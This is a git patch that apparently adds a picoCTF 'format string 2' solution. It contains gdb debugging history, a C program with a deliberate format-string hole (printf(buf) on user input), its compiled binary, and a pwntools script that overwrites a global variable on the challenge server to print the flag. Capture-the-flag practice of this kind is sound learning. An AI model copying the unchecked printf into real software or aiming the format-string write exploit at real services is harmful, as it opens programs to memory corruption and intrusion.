From b4bd094d7e266097471a81fa92f9ab47b107e10c Mon Sep 17 00:00:00 2001
From: Maxime Vorwerk <maxime@4-werk.com>
Date: Sat, 2 Nov 2024 02:00:29 +0100
Subject: [PATCH] format string 2

---
 format_string_2/.gdb_history          | 217 ++++++++++++++++++++++++++
 format_string_2/peda-session-vuln.txt |   2 +
 format_string_2/sol.py                |  24 +++
 format_string_2/vuln                  | Bin 0 -> 16272 bytes
 format_string_2/vuln.c                |  35 +++++
 5 files changed, 278 insertions(+)
 create mode 100644 format_string_2/.gdb_history
 create mode 100644 format_string_2/peda-session-vuln.txt
 create mode 100755 format_string_2/sol.py
 create mode 100755 format_string_2/vuln
 create mode 100644 format_string_2/vuln.c

diff --git a/format_string_2/.gdb_history b/format_string_2/.gdb_history
new file mode 100644
index 0000000..28b50a2
--- /dev/null
+++ b/format_string_2/.gdb_history
@@ -0,0 +1,217 @@
+disassemble main
+b *main+75
+run 
+exit
+disams main
+disasm
+disams main
+disasm main
+disassemble main
+b *main+75
+run
+n
+n
+n
+n
+stack
+stack 10
+stack 20
+stack 40
+search 0x21737573
+search \x21\x73\x75\x73
+search -dword 0x21737573
+search --dword 0x21737573
+search --dword 0x00404060
+search --qword 0x0000000000404060
+disassemble main
+stack 40
+stack 60
+search --dword 0x21737573
+run 
+continue
+run
+stack 40
+stack 60
+continue
+run
+search --dword 0x21737573
+continue
+run
+continue
+run
+disassemble main
+exit
+disassemble main
+exit
+disassemble main 
+b *main+95
+run
+stack 60
+help x
+stack 60
+x 1xg 0x7fffffffbc70
+x 1x 0x7fffffffbc70
+x  0x7fffffffbc70
+x 0x7fffffffbc70
+2x 0x7fffffffbc70
+x2 0x7fffffffbc70
+x 2 0x7fffffffbc70
+x /2 0x7fffffffbc70
+x /1xg 0x7fffffffbc70
+n
+x /1xg 0x7fffffffbc70A
+continue
+continue
+run
+exit
+b *main+95
+run
+x /1xg 0x7fffffffbc70A
+stack
+stack 60
+x /1xg 0x7fffffffbc70
+continue
+run
+stack
+stack 60
+x /1xg 0x7fffffffbc70
+continue
+run
+stack 60
+continue
+exit
+python import sys
+python print(sys.path)
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+exit
+disassemble main
+b *main+95
+run
+stack 40
+continue
+disassemble main
+run
+stack 40
+continue
+search b570
+find b570
+run
+stack 40
+continue
+info
+exit
+disassemble main
+b *main+95
+run
+stack 40
+continue
+run
+stack 40
+continue
+run
+n
+stack 40
+exit
+disassemble main
+b *main+95
+run
+n
+x/1x
+x/2xw 0x7fffffffb570
+x/xw 0x7fffffffb570
+x 0x7fffffffb570
+continue
+run
+x 0x7fffffffb570
+n
+x 0x7fffffffb570
+continue
+run
+stack 60
+continue
+run
+stack 60
+n
+continue
+run
+stack 20
+continue
+run
+stack
+stack20
+stack 20
+continue
+run
+stack 20
+continue
+run 
+exit
+b *main+95
+run < python print(b"\x60\x40\x40\x00")
+run < python -c "print(b"\x60\x40\x40\x00")"
+run < python3 -c "print(b"\x60\x40\x40\x00")"
+exit
+b *main+95
+run < pipe
+exit
+b *main+95
+run < pipe
+continue
+exit
+b *main+95
+run < pipe
+stack 20
+x 0x404060
+n
+x 0x404060
+exit
+b *main+95
+run
+stack 20
+n
+exit
+exit
+b *main+95
+run
+run < pipe
+x 0x404060
+n
+x 0x404060
+stack 20
+continue
+exit
+b *main+95
+run
+run < pipe
+disassemble main
+x 0x404060
+x 0x7fffffffba00
+x $rip
+x $rip+0x2de7
+x 0x401273+0x2de7
+x 0x401279+0x2de7
+stack 40
+continue
+run
+stack 40
+n
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+exit
diff --git a/format_string_2/peda-session-vuln.txt b/format_string_2/peda-session-vuln.txt
new file mode 100644
index 0000000..fe91fea
--- /dev/null
+++ b/format_string_2/peda-session-vuln.txt
@@ -0,0 +1,2 @@
+break *main+95
+
diff --git a/format_string_2/sol.py b/format_string_2/sol.py
new file mode 100755
index 0000000..60eb32f
--- /dev/null
+++ b/format_string_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.arch = "amd64"
+
+address = "rhea.picoctf.net"
+port = 51393
+conn = remote(address, port)
+
+def send_payload(payload):
+    conn = remote(address, port)
+    log.info(f"payload: {repr(payload)}")
+    conn.sendline(payload)
+    return conn.recvall()
+
+format_string = FmtStr(send_payload)
+offset = format_string.offset
+
+payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
+log.info(payload)
+conn.sendline(payload)
+
+flag = conn.recvall()
+log.success(flag)
diff --git a/format_string_2/vuln b/format_string_2/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..c73077a23f4cc42f76c53d29461c6185966643ed
GIT binary patch
literal 16272
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

literal 0
HcmV?d00001

diff --git a/format_string_2/vuln.c b/format_string_2/vuln.c
new file mode 100644
index 0000000..2e2b2c7
--- /dev/null
+++ b/format_string_2/vuln.c
@@ -0,0 +1,35 @@
+#include <stdio.h>
+
+int sus = 0x21737573;
+
+int main() {
+  char buf[1024];
+  char flag[64];
+
+
+  printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
+  fflush(stdout);
+  scanf("%1024s", buf);
+  printf("Here's your input: ");
+  printf(buf);
+  printf("\n");
+  fflush(stdout);
+
+  if (sus == 0x67616c66) {
+    printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
+
+    // Read in the flag
+    FILE *fd = fopen("flag.txt", "r");
+    fgets(flag, 64, fd);
+
+    printf("%s", flag);
+    fflush(stdout);
+  }
+  else {
+    printf("sus = 0x%x\n", sus);
+    printf("You can do better!\n");
+    fflush(stdout);
+  }
+
+  return 0;
+}